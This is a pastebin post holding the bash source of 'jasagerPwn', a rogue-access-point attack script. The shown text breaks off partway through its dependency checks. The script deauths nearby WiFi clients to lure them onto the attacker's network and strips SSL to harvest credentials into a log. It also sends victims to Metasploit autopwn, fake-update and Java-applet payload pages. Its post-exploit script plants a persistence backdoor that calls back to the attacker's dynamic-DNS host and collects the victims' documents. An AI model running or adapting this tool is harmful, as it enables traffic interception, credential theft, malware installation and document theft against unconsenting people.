Home
My Posts

Archive
Login
Signup

Recent Posts

Free subdomains

Want your own xyz.kpaste.net sub-domain for your community? Just type the address into your browser address bar (foo.xyz.kpaste.net is also supported).

Suggestions/Bugs?

Email us at . Try to include as much info as possible.

About

Pastebin is a tool for collaborative debugging or editing.

 

jasagerPwn-1.1-r44
Posted by Anonymous on Sat 7th May 2011 02:14
raw | new post

Submit a correction or amendment below (click here to make a fresh posting)
After submitting an amendment, you'll be able to view the differences between the old and new posts easily.

Syntax highlighting: None Bash C C++ CSS Diff HTML mIRC Script Perl PHP Python Smarty XML ---------------------------- ABAP Actionscript ADA Apache Log AppleScript APT sources.list ASM ASP AutoIT Bash C C# C++ C++ (with QT) CSS Diff HTML INI (Config Files) Java Javascript Lua Make mIRC Script MySQL NSIS Perl PHP Python Q(uick)BASIC robots Ruby Ruby on Rails SDLBasic Smarty SQL TCL Text VB.NET Visual BASIC Visual Fox Pro Visual Prolog Windows Registry Files XML Xorg.conf

To highlight particular lines, prefix each line with {%HIGHLIGHT}
jasagerPwn-1.1-r44 #!/bin/bash #leg3nd's JasagerPwn Attack - v1.1 - rev44 #ATTACKS - browserPwn - Redirect LAN to Metasloits auxillary module browser autoPwn for sessions # - FakeUpdate - Redirect LAN to fake update page with metasploit payload download. # - Java Applet - Redirects LAN to a java applet with meterpreter payload. via SET. # - Sniffer - Justs picks up traffic with no ARP posioning, and perfect ssl stripping # - DeAuth - Deauths nearby clients from their APs and try to make them join yours # #Allows control of transparency of all attacks via built in bash menu. # Reqires: Aircrack-ng suite (w/ airdrop-ng), Metasploit Framework, Social Engineering Toolkit, Dsniff suite # Apache2, working ruby and python, Injection, DHCP3, SSLstrip, PHP5, Macchanger. # # Created for and tested with an RTL8187 monitor mode card, and a open-WRT Fon+ (Pineapple). # For More Information refer to INSTALL_HOWTO, usage information -h / -? #SCRIPT CONFIGURATION BELOW - ADJUST TO YOUR WIFI CONFIGURATION IFACE="usb0" #Connection to the internet (gateway), EG wlan0,eth1,usb0,ppp0,etc WiFiMODE="0" #Use WiFi For Internet Gateway (Will create a DeAuth Rule so you dont own yourself) EG 0,1 fonIP="192.168.10.2" #Fon router Iface IP, this is HARDCODED to 192.168.10.0 subnet. FONIFACE="eth0" #Interface facing the Jasager router WIFACE="wlan0" #Wireless Interface, EG wlan0,ath0,wifi0 MIFACE="mon0" #Monitor Interface for Attacks #Macchanger, ONLY FOR ATTACK INTERFACES macMode="set" #Mac spoofing mode - set / random (case sensitive) fakeMac="00:e0:f7:99:e1:30" # 00:e0:f7:99:e1:30 (Cisco Systems, Inc.) lawl ourAPmac="00:12:CF:A4:92:B1" #Pineapple MAC so we dont DeAuth Ourselves! msfpath="/pentest/exploits/framework3" #Metasploit Location (if not BT4, use msf3 directory) SETpath="/pentest/exploits/SET" #Social Engineering Toolkit Location DomainName="Networking.com" #Domain name for DHCP configuration. ###################################################################################################################### #Funcion can be used to customize post-exploit meterpreter script. this steals documents and adds a backdoor. #This slightly modified persistence script supports D-DNS tracking (like dyndns.org or no-ip) autoMetScript="0" #Allows you to automaticlly run a meterpreter persistence script on the victim. Pport="31337" # persistence backdoor port PersIP="Your.dyndns.com" # Your dyndns or no-ip for backdoors pwd=`echo $PWD` function metScript(){ if [ -e "$SETpath/src/program_junk/multi_meter.file" ] ; then rm "$SETpath/src/program_junk/multi_meter.file" ; fi # EDIT METERPRETER SCRIPT BELOW THIS echo -e "persistence_dns -r $PersIP -p $Pport -i 60 -X -A file_collector -d c:\\Users\\ -r -f *.doc|*.pdf|*.xls|*.docx| -o /tmp/files file_collector -i /tmp/files -l $pwd/collected__$NOW " > $SETpath/src/program_junk/multi_meter.file } ####END SCRIPT CONFIG###### #==================================================================================================================== ##################################################################################################################### while getopts "a:p:i:w:m:s:d:h:?uU" OPTIONS; do case ${OPTIONS} in a ) autoMetScript=$OPTARG ;; p ) Pport=$OPTARG ;; d ) WiFiMODE=$OPTARG ;; i ) IFACE=$OPTARG ;; w ) WIFACE=$OPTARG ;; h ) help ;; m ) macMode=$OPTARG ;; s ) fakeMac=$OPTARG ;; u ) update ;; U ) Fupdate ;; ? ) help ;; * ) echo -e "\e[01;31m[!]\e[00m Error: Unknown Switch Option" 1>&2 ;; # Default esac done #SCRIPT VARIABLES - DO NOT TOUCH - HARDCODED AND SENSITIVE #REQUIRED CHECKS FOR FUNCTIONALITY version="1.1" rev="44" Fwww="/var/www/fakeupdate" Jwww="/var/www/javapwn" Gwww="/var/www/google" gatewayIP=`route -n | awk '/^0.0.0.0/ {getline; print $2}'` WIFcheck=`ifconfig | grep $WIFACE | awk '{ print $1 }'` IFcheck=`ifconfig | grep $IFACE | awk '{ print $1 }'` NOW=$(date +"%b-%d_%H:%m:%S") sslport="11000" SPWD=`echo $PWD` javasite="1" sniffing="0" wasSniffing="0" fakeupdate="0" browserpwn="0" javaATK="0" z="1" moncheck=`ifconfig | grep $MIFACE | awk '{print $1}' | cut -b 4` ATKcheck=`ifconfig | grep $MIFACE | awk '{print $1}' | cut -b 4` ourIP=`ifconfig $FONIFACE | awk '/inet addr/ {split ($2,A,":"); print A[2]}'` wifiMAC=`ifconfig $IFACE | grep "HWaddr" | awk '{print $5}' | tr "[a-z]" "[A-Z]"` googleRev=`wget -qO- "http://jasager-pwn.googlecode.com/svn/trunk/" | grep "<title>jasager-pwn - Revision" | awk -F " " '{split ($4,A,":"); print A[1]}'` trap 'cleanup' 2 # Interrupt - "Ctrl + C" #----------------------------------------------------------------------- function help() { #help echo " (C)opyright 2011 leg3nd @ www.info-s3curity.com Usage: bash jasagerPwn -i [interface] -m [random/set] -s [00:11:22:33:44:55] -p [31337] -a [0/1] -w [interface] Options: -a [0/1] : Auto-Run Meterpreter Script, Customize in script. Current = $autoMetScript -p [31337] : Auto-Run Scripts persistence Port. Current = $Pport -i [interface] : Internet Gateway Interface. Current = $IFACE -w [interface] : WiFi Card Interface. Current = $WIFACE -d [0/1] : WiFi Gateway Mode - Adds DeAuth Rule For Yourself = $WiFiMODE -m [random/set] : Change the Attack Interfaces MAC Address. Current = $macMode -s [MAC] : Use this MAC Address. Requires -m. Current = $fakeMac -u : Update script and its resources from Google Code. -U : Update script, SET, and Metasploit. -? / -h : Help Screen and Switches. More Information In top of script. For Installation, setup, and more information, please reference the INSTALL file or http://www.hak5.org/forums/index.php?showtopic=19955 " exit 1 } function IPTABLES(){ xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Clearing IPTables" -e "iptables --flush" xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Clearing IPTables" -e "iptables --table nat --flush" xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Clearing IPTables" -e "iptables --delete-chain" xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Clearing IPTables" -e "iptables --table nat --delete-chain" xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Clearing IPTables" -e "iptables -X" xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Clearing IPTables" -e "iptables -F" iptables -P FORWARD ACCEPT iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT iptables -A FORWARD -i $FONIFACE -o $IFACE -m state --state NEW -j ACCEPT if [ $gatewayIP ]; then iptables -t nat -A PREROUTING --in-interface $FONIFACE -p udp --dport 53 -j DNAT --to $gatewayIP ; fi iptables --append FORWARD --in-interface $FONIFACE -j ACCEPT iptables --table nat --append POSTROUTING --out-interface $IFACE -j MASQUERADE #check for sslstrip #if [ $sniffing -eq 1 ]; then #iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports $sslport #iptables --table nat --append PREROUTING --proto tcp --destination-port 80 --jump REDIRECT --to-port $sslport #fi ifconfig $FONIFACE $fonIP } function ipTableRedirect { xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Clearing IPTables" -e "iptables --flush" xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Clearing IPTables" -e "iptables --table nat --flush" xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Clearing IPTables" -e "iptables --delete-chain" xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Clearing IPTables" -e "iptables --table nat --delete-chain" xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Clearing IPTables" -e "iptables -X" xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Clearing IPTables" -e "iptables -F" sleep 1 if [ $sniffing -eq "1" ] ; then #iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports $sslport #iptables --table nat --append PREROUTING --proto tcp --destination-port 80 --jump REDIRECT --to-port 80 xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing Tail" -e "kill $TAILPID" & xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing SSLStrip" -e "killall -9 sslstrip" & wasSniffing=$sniffing sniffing="0" fi iptables -P FORWARD ACCEPT iptables --append FORWARD --in-interface $FONIFACE -j ACCEPT iptables --table nat --append POSTROUTING --out-interface $IFACE -j MASQUERADE iptables -t nat -A PREROUTING --in-interface $FONIFACE -p udp -j DNAT --to $fonIP iptables --table nat --append PREROUTING --in-interface $FONIFACE --proto tcp --jump DNAT --to $fonIP iptables --table nat --append PREROUTING --in-interface $FONIFACE --jump REDIRECT iptables --table nat --append PREROUTING --in-interface $FONIFACE #redirect all traffic to us #iptables -t nat -A PREROUTING -i $FONIFACE -j REDIRECT ifconfig $FONIFACE $fonIP } #Script update via google code function update(){ if [ ! $googleRev ]; then echo -e "\e[01;31m[!]\e[00m ERROR: Couldn't resolve revision from google.." exit 1 elif [ $googleRev -lt $rev ]; then echo -e "\e[01;31m[!]\e[00m ERROR: Your revision number is too new.." exit 1 elif [ $googleRev -gt $rev ]; then echo -e "\e[01;36m[~]\e[00m leg3nd's JasagerPwn v$version rev$rev - Updating to rev$googleRev..." wget -q -N "http://jasager-pwn.googlecode.com/svn/trunk/jasagerPwn" wget -q -P "./src/" -N "http://jasager-pwn.googlecode.com/svn/trunk/src/persistence_dns.rb" wget -q -P "./src/" -N "http://jasager-pwn.googlecode.com/svn/trunk/src/deauth.sh" #FakeUpdate for Fitems in "favicon.ico" "index.php" "style.css" "sbd.exe" "vnchooks.dll" "wkv-x64.exe" "wkv-x86.exe" "winvnc.exe" "vnc.reg" ; do if [ -e "./src/wwwFakeupdate/" ] ; then wget -q -N -P "./www/" "http://jasager-pwn.googlecode.com/svn/trunk/wwwFakeupdate/$Fitems" ; fi if [ -e "$Fwww/" ] ; then wget -q -N -P "$Fwww/" "http://jasager-pwn.googlecode.com/svn/trunk/src/wwwFakeupdate/$Fitems" ; fi done #JavaPwn for Jitems in "index.template" "index.template.plain" ; do if [ -e "./src/wwwJava/" ] ; then wget -q -N -P "./src/wwwJava/" "http://jasager-pwn.googlecode.com/svn/trunk/wwwJava/$Jitems" ; fi if [ -e "$Jwww/" ] ; then wget -q -N -P "$Jwww/" "http://jasager-pwn.googlecode.com/svn/trunk/src/wwwJava/$Jitems" ; fi done for Jitems2 in "global.js" "index.jsp" "oo_conf_en-US.js" "oo_engine.js" "popUp.js" "print.css" "s_code_remote.js" "screen.css" ; do if [ -e "./src/wwwJava/temp/" ] ; then wget -q -N -P "./src/wwwJava" "http://jasager-pwn.googlecode.com/svn/trunk/wwwJava/temp/$Jitems2" ; fi if [ -e "$Jwww/temp/" ] ; then wget -q -N -P "$Jwww/temp/" "http://jasager-pwn.googlecode.com/svn/trunk/src/wwwJava/temp/$Jitems2" ; fi done #Google for Gitems in "index.template" ; do if [ -e "./src/wwwGoogle/" ] ; then wget -q -N -P "./src/wwwGoogle/" "http://jasager-pwn.googlecode.com/svn/trunk/wwwGoogle/$Gitems" ; fi if [ -e "$Fwww/" ] ; then wget -q -N -P "$Fwww/" "http://jasager-pwn.googlecode.com/svn/trunk/src/wwwGoogle/$Gitems" ; fi done for Gitems2 in "favicon.ico" "gzip.html" "js1.js" ; do if [ -e "./src/wwwGoogle/temp/" ] ; then wget -q -N -P "./wwwGoogle/temp/" "http://jasager-pwn.googlecode.com/svn/trunk/wwwGoogle/temp/$Gitems2" ; fi if [ -e "$Gwww/temp/" ] ; then wget -q -N -P "$Jwww/temp/" "http://jasager-pwn.googlecode.com/svn/trunk/src/wwwGoogle/temp/$Gitems2" ; fi done elif [ $googleRev -eq $rev ]; then echo -e "\e[01;36m[~]\e[00m leg3nd's JasagerPwn v$version rev$rev - Your Already Up To Date!" fi echo -e "\e[01;36m[~]\e[00m leg3nd's JasagerPwn v$version rev$googleRev - All Done!" exit 1 } #Full update including MSF/SET function Fupdate(){ echo -e "\e[01;36m[~]\e[00m leg3nd's JasagerPwn v$version rev$googleRev - Updating Metasploit.." xterm -fg green -bg black -geometry 75x20+0+0 -T "JasagerPwn v$version rev$googleRev - Metaploit Update" -e "cd $msfpath && ./msfupdate" echo -e "\e[01;36m[~]\e[00m leg3nd's JasagerPwn v$version rev$googleRev - Updating SET.." xterm -fg green -bg black -geometry 75x20-0+0 -T "JasagerPwn v$version rev$googleRev - SET Update" -e "cd $SETpath && python set-update" if [ ! $googleRev ]; then echo -e "\e[01;31m[!]\e[00m ERROR: Couldn't resolve revision from google.." exit 1 elif [ $googleRev -lt $rev ]; then echo -e "\e[01;31m[!]\e[00m ERROR: Your revision number is too new.." exit 1 elif [ $googleRev -gt $rev ]; then echo -e "\e[01;36m[~]\e[00m leg3nd's JasagerPwn v$version rev$rev - Updating to rev$googleRev..." wget -q -N "http://jasager-pwn.googlecode.com/svn/trunk/jasagerPwn" wget -q -P "./src/" -N "http://jasager-pwn.googlecode.com/svn/trunk/src/persistence_dns.rb" wget -q -P "./src/" -N "http://jasager-pwn.googlecode.com/svn/trunk/src/deauth.sh" #FakeUpdate for Fitems in "favicon.ico" "index.php" "style.css" "sbd.exe" "vnchooks.dll" "wkv-x64.exe" "wkv-x86.exe" "winvnc.exe" "vnc.reg" ; do if [ -e "./src/wwwFakeupdate/" ] ; then wget -q -N -P "./www/" "http://jasager-pwn.googlecode.com/svn/trunk/wwwFakeupdate/$Fitems" ; fi if [ -e "$Fwww/" ] ; then wget -q -N -P "$Fwww/" "http://jasager-pwn.googlecode.com/svn/trunk/src/wwwFakeupdate/$Fitems" ; fi done #JavaPwn for Jitems in "index.template" "index.template.plain" ; do if [ -e "./src/wwwJava/" ] ; then wget -q -N -P "./src/wwwJava/" "http://jasager-pwn.googlecode.com/svn/trunk/wwwJava/$Jitems" ; fi if [ -e "$Jwww/" ] ; then wget -q -N -P "$Jwww/" "http://jasager-pwn.googlecode.com/svn/trunk/src/wwwJava/$Jitems" ; fi done for Jitems2 in "global.js" "index.jsp" "oo_conf_en-US.js" "oo_engine.js" "popUp.js" "print.css" "s_code_remote.js" "screen.css" ; do if [ -e "./src/wwwJava/temp/" ] ; then wget -q -N -P "./src/wwwJava" "http://jasager-pwn.googlecode.com/svn/trunk/wwwJava/temp/$Jitems2" ; fi if [ -e "$Jwww/temp/" ] ; then wget -q -N -P "$Jwww/temp/" "http://jasager-pwn.googlecode.com/svn/trunk/src/wwwJava/temp/$Jitems2" ; fi done #Google for Gitems in "index.template" ; do if [ -e "./src/wwwGoogle/" ] ; then wget -q -N -P "./src/wwwGoogle/" "http://jasager-pwn.googlecode.com/svn/trunk/wwwGoogle/$Gitems" ; fi if [ -e "$Fwww/" ] ; then wget -q -N -P "$Fwww/" "http://jasager-pwn.googlecode.com/svn/trunk/src/wwwGoogle/$Gitems" ; fi done for Gitems2 in "favicon.ico" "gzip.html" "js1.js" ; do if [ -e "./src/wwwGoogle/temp/" ] ; then wget -q -N -P "./wwwGoogle/temp/" "http://jasager-pwn.googlecode.com/svn/trunk/wwwGoogle/temp/$Gitems2" ; fi if [ -e "$Gwww/temp/" ] ; then wget -q -N -P "$Jwww/temp/" "http://jasager-pwn.googlecode.com/svn/trunk/src/wwwGoogle/temp/$Gitems2" ; fi done elif [ $googleRev -eq $rev ]; then echo -e "\e[01;36m[~]\e[00m leg3nd's JasagerPwn v$version rev$rev - Your Already Up To Date!" fi echo -e "\e[01;36m[~]\e[00m leg3nd's JasagerPwn v$version rev$googleRev - All Done!" exit 1 } #Parse that messy SSLstrip.log SSLparse(){ if [ -e "/$PWD/sslstrip.log" ]; then LOGPATH="/$PWD/sslstrip.log" DEFS="cred-collector/definitions.sslstrip" # NUMLINES=$(cat "$DEFS" | wc -l) i=1 while [ $i -le $NUMLINES ]; do VAL1=$(awk -v k=$i 'FNR == k {print $1}' "$DEFS") VAL2=$(awk -v k=$i 'FNR == k {print $2}' "$DEFS") VAL3=$(awk -v k=$i 'FNR == k {print $3}' "$DEFS") VAL4=$(awk -v k=$i 'FNR == k {print $4}' "$DEFS") GREPSTR="$(grep -a $VAL2 "$LOGPATH" | grep -a $VAL3 | grep -a $VAL4)" if [ "$GREPSTR" ]; then echo -n "$VAL1" "- " >> /$PWD/cred-collector/ssl-collection.log echo "$GREPSTR" | \ sed -e 's/.*'$VAL3'=/'$VAL3'=/' -e 's/&/ /' -e 's/&.*//' >> /$PWD/cred-collector/ssl-collection.log fi i=$[$i+1] done fi } #function for fluid use of both SET templates function JavaSite(){ GoogCheck=`cat $SETpath/config/set_config | grep "APACHE_DIRECTORY=/var/www/javapwn"` #1 = google 2 = java required if [ "$javasite" -eq "1" ] && [ "$GoogCheck" = "APACHE_DIRECTORY=/var/www/javapwn" ]; then sed ''${SETapacheDIR}'s!APACHE_DIRECTORY=/var/www/javapwn!APACHE_DIRECTORY=/var/www/google!' $SETpath/config/set_config > $SETpath/config/set_configJ sleep 1 mv $SETpath/config/set_configJ $SETpath/config/set_config elif [ "$javasite" -eq "2" ]; then sed ''${SETapacheDIR}'s!APACHE_DIRECTORY=/var/www/google!APACHE_DIRECTORY=/var/www/javapwn!' $SETpath/config/set_config > $SETpath/config/set_configG sleep 1 mv $SETpath/config/set_configG $SETpath/config/set_config fi } function sslstrip(){ iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports $sslport xterm -geometry 75x3+1-25 -bg black -fg green -e "sslstrip -l $sslport && sleep 3" & if [ ! -e sslstrip.log ]; then touch sslstrip.log; fi xterm -geometry 75x24+464+65 -bg black -fg green -T "SSLStrip Sniffing" -e "tail -f sslstrip.log" & TAILPID=`echo $!` sniffing="1" wasSniffing=$sniffing } function cleanup() { echo echo -e "\e[01;32m[>]\e[00m Cleaning up..." if [ $z = 1 ]; then SSLparse && sleep 1 if test -e /tmp/dhcpd.conf; then rm /tmp/dhcpd.conf; fi xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing DriftNET" -e "killall -9 driftnet" & xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing SSLStrip" -e "killall -9 sslstrip" & xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing Apache" -e "/etc/init.d/apache2 stop" & xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing Tail" -e "kill $DNSID" & xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing Dsniff" -e "kill $dsniffID" & xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing Tail" -e "kill $TAILPID" & #xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing SSL Parsing" -e "kill $parseID" & xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing DHCP" -e "kill $messageID" & xterm -geometry 75x12+464+288 -bg black -fg green -T "JasagerPwn v$version - Killing DeAuth Attacks" -e "kill $AIRDROPID && kill $AIRDUMPID && kill $airID && kill $ipID && kill $dnsID2 && kill $parseID" & #xterm -geometry 75x7+10+330 -T "[leg3nd-BrowserPwn] v$version - Killing DNSSpoof" -e "killall -9 dnsspoof" & xterm -geometry 75x7+10+330 -T "[JasagerPwn-BrowserPwn] v$version - Killing DHCP3" -e "/etc/init.d/dhcp3-server stop" xterm -geometry 75x7+10+330 -T "[JasagerPwn-BrowserPwn] v$version - Killing URLSnarf" -e "killall -9 urlsnarf" xterm -geometry 75x7+10+330 -T "[JasagerPwn-BrowserPwn] v$version - Killing URLSnarf" -e "killall -9 dsniff" xterm -geometry 75x8+100+0 -T "v$version - Killing 'IPtables'" -e "iptables -F" & xterm -geometry 75x8+100+0 -T "v$version - Killing 'IPtables'" -e "iptables -X" & #Clean up our cfgs if test -e dsniff*; then rm dsniff*; fi if [ -e "/$PWD/dsniff.services" ]; then rm "/$PWD/dsniff.services" ; fi if [ -e *.png ]; then rm *.png ; fi if [ -d "$SETpath/src/html/templates/java/temp/" ]; then rm -rf $SETpath/src/html/templates/java/temp/ ; fi if [ -d "$SETpath/src/html/templates/google/temp/" ]; then rm -rf $SETpath/src/html/templates/google/temp/ ; fi if [ -e "$SETpath/src/html/templates/java/index.template" ] && [ -e "$SETpath/src/html/templates/java/index.template.ORIGINAL" ]; then mv "$SETpath/src/html/templates/java/index.template.ORIGINAL" "$SETpath/src/html/templates/java/index.template" fi APACHEDIR=`cat $SETpath/config/set_config | grep "/var/www/javapwn"` if [ -e "$SETpath/src/html/templates/google/index.template.ORIGINAL" ] ; then mv $SETpath/src/html/templates/google/index.template.ORIGINAL $SETpath/src/html/templates/google/index.template ; fi if [ -e "$SETpath/src/html/templates/java/index.template.ORIGINAL" ] ; then mv $SETpath/src/html/templates/java/index.template.ORIGINAL $SETpath/src/html/templates/java/index.template ; fi if [ -e "$SETpath/config/set_config.ORIGINAL" ] ; then mv $SETpath/config/set_config.ORIGINAL $SETpath/config/set_config ; fi if [ -e "/etc/dhcp3/dhcpd.conf" ] && [ -e "/etc/dhcp3/dhcpd.conf.ORIGINAL" ] ; then rm /etc/dhcp3/dhcpd.conf && mv /etc/dhcp3/dhcpd.conf.ORIGINAL /etc/dhcp3/dhcpd.conf ; fi if [ -e "/etc/resolv.conf" ] && [ -e "/etc/resolv.conf.ORIGINAL" ] ; then rm /etc/resolv.conf && mv /etc/resolv.conf.ORIGINAL /etc/resolv.conf ; fi if test -e /tmp/auto-java2; then rm /tmp/auto-java2; fi if test -e sslstrip.log; then mv sslstrip.log /$PWD/cred-collector/$NOW-sslstrip.log; fi xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing Self" -e "killall -9 jasagerPwn" & fi echo -e "\e[01;36m[~]\e[00m Exiting with elegance.." exit 0 } #xterm -geometry 75x8+100+0 -e "ifconfig $WIFACE up && sleep 2" ifconfig $WIFACE up && sleep 1 gatewayIP=`route -n | awk '/^0.0.0.0/ {getline; print $2}'` WIFcheck=`ifconfig | grep $WIFACE | awk '{ print $1 }'` IFcheck=`ifconfig | grep $IFACE | awk '{ print $1 }'` ifconfig $FONIFACE $fonIP #xterm -geometry 0x0+0+0 -e "while true ; do ifconfig $FONIFACE $fonIP && sleep 10 ; done" & #make sure our IP doesnt get screwy from any dhcp.. while true ; do ifconfig $FONIFACE $fonIP && sleep 10 ; done & ipID=`echo $!` gatewayIP=`route -n | awk '/^0.0.0.0/ {getline; print $2}'` #check for required interfaces if [ "$WIFcheck" != "$WIFACE" ]; then echo -e "\e[01;31m[!]\e[00m FATAL: Cannot Locate $WIFACE..." && exit 0 fi if [ "$IFcheck" != "$IFACE" ]; then echo -e "\e[01;31m[!]\e[00m FATAL: Cannot Locate $IFACE..." && exit 0 fi #----------------------------------------------------------------------- clear echo echo echo ' __------__' echo ' /~ ~\' echo ' | //^\//^\| Lets get this show on the road!!' echo " /~~\ || o| |o|:~\ #! JasagerPwn MultiAttack v$version" echo ' | |6 ||___|_|_||:| / By leg3nd @ info-s3curity.com' echo " \__. / o \/ / rev$rev" echo ' | ( O ) [!] Use At your Own Risk [!]' echo ' /~~~~\ `\ \ /' echo ' | |~~\ | ) ~------~`\' echo ' / | | | / ____ /~~~)\' echo ' (_/ | | | /. | ( |' echo ' | | | \ / __)/ \' echo ' \ \ \ \/ /- \ `\' echo ' \ \|\ / | |\___|' echo ' \ | \____/ | |' echo ' /^~> \ _/ <' echo ' | | \ \' echo ' | | \ \ \' echo ' -^-\ \ | )' echo ' `\_______/^\______/' echo echo echo -e "\e[01;32m[>]\e[00m Stopping services and programs..." #xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing 'Stopping airmon-ng Interfaces'" -e "airmon-ng stop $MIFACE" xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing 'DHCP3 Service'" -e "/etc/init.d/dhcp3-server stop" xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing Sniffing Apps" -e "killall -9 dhcpd3 airbase-ng ettercap sslstrip driftnet urlsnarf" xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing DNS Spoof" -e "killall -9 dnsspoof" xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing WICD" -e "killall -9 wicd" xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing WICD" -e "/etc/init.d/wicd stop" & sleep 1 echo -e "\e[01;32m[>]\e[00m Checking Environment..." #test for injection - too glitchy so just got rid of it.. #injection=`aireplay-ng --test $MIFACE -i $MIFACE | sed -n -e ''3'p' | awk '{ print $2, $3, $4 }' | cut -b 1-20` #if [ "$injection" != "Injection is working" ]; then echo -e "\e[01;31m[!]\e[00m FATAL: $MIFACE Packet Injection Failed.. Try again, or Re-plug it in." && cleanup ; fi #Check for root if [ "$(id -u)" != "0" ]; then echo -e "\e[01;31m[!]\e[00m FATAL: Not Root.." && cleanup ; fi # Check for dependencies, if not install them #Dependencies checks dhcp3check=`dpkg -l | grep dhcp3-server | awk '{print $2}' | head -n 1` apache2check=`dpkg -l | grep apache2 | awk '{print $2}' | head -n 1` apache2phpcheck=`dpkg -l | grep "libapache2-mod-php5" | awk '{print $2}' | head -n 1` dsniffcheck=`dpkg -l | grep dsniff | awk '{print $2}' | head -n 1` php5check=`dpkg -l | grep php5 | awk '{print $2}' | head -n 1` macchangerCheck=`dpkg -l | grep macchanger | awk '{print $2}' | head -n 1` aircrackCheck=`dpkg -l | grep aircrack | awk '{print $2}' | head -n 1` sleep 1 if [ ! $dhcp3check ] || [ ! $apache2check ] || [ ! $apache2phpcheck ] || [ ! $dsniffcheck ] || [ ! $php5check ] || [ ! $macchangerCheck ] || [ ! $aircrackCheck ] || [ ! -e "/usr/bin/airdrop-ng" ] || [ ! -e $SETpath/src/payloadgen/pefile.py ]; then echo && echo -e "\e[01;31m[!]\e[00m Some dependencies were not found.. We will try to install them now..." && echo elif [ ! -e "/usr/local/bin/sslstrip" ] && [ ! -e "/usr/bin/sslstrip" ]; then echo && echo -e "\e[01;31m[!]\e[00m Some dependencies were not found.. We will try to install them now..." && echo fi # dhcp3-server check if [ ! $dhcp3check ]; then echo -e "\e[01;31m[!]\e[00m No dhcp3-server was detected... Installing.." xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Dependencies Installation" -e "sudo apt-get -y install dhcp3-server && update-rc.d -f dhcp3-server remove" fi # dsniff check if [ ! $dsniffcheck ]; then echo -e "\e[01;31m[!]\e[00m No Dsniff suite was detected... Installing.." xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Dependencies Installation" -e "sudo apt-get -y install dsniff" fi # apache2 check if [ ! $apache2check ]; then echo -e "\e[01;31m[!]\e[00m No apache2 server was detected... Installing.." xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Dependencies Installation" -e "sudo apt-get -y install apache2 && update-rc.d -f apache2 remove" elif [ ! $apache2phpcheck ]; then echo -e "\e[01;31m[!]\e[00m No apache2 PHP5 module was detected... Installing.." xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Dependencies Installation" -e "sudo apt-get -y install libapache2-mod-php5" fi # php5 check if [ ! $php5check ]; then echo -e "\e[01;31m[!]\e[00m No PHP5 was detected... Installing.." xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Dependencies Installation" -e "sudo apt-get -y install php5 php5-curl" fi # macchanger check if [ ! $macchangerCheck ]; then echo -e "\e[01;31m[!]\e[00m No Macchanger was detected... Installing.." xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Dependencies Installation" -e "sudo apt-get -y install macchanger" fi # aircrack-ng check if [ ! $aircrackCheck ] && [ ! -e "/usr/local/bin/aircrack-ng" ]; then echo -e "\e[01;31m[!]\e[00m No Aircrack-ng suite was detected... Installing.." xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Dependencies Installation" -e "sudo apt-get -y install aircrack-ng" fi #sslstrip check if [ ! -e "/usr/local/bin/sslstrip" ] && [ ! -e "/usr/bin/sslstrip" ]; then xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Dependencies Installation" -e "sudo apt-get -y install twisted-web linux-headers-`uname -r` build-essential gcc g++" wget -q -P "/tmp" http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.8.tar.gz tar xf /tmp/sslstrip-0.8.tar.gz -C "/tmp/" chmod +x /tmp/sslstrip-0.8/setup.py xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Dependencies Installation" -e "python /tmp/sslstrip-0.8/setup.py install" if [ -d "/tmp/sslstrip-0.8/" ]; then rm -rf /tmp/sslstrip-0.8/ ; fi fi #airdrop-ng check if [ ! -e "/usr/bin/airdrop-ng" ]; then if [ -e "/pentest/wireless/airdrop-ng/install.py" ]; then xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Dependencies Installation" -e "sudo apt-get -y install python2.6 python2.6-dev python-psyco" chmod +x /pentest/wireless/airdrop-ng/install.py xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Dependencies Installation" -e "python /pentest/wireless/airdrop-ng/install.py" xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Dependencies Installation" -e "airdrop-ng -u OUIUPDATE" else 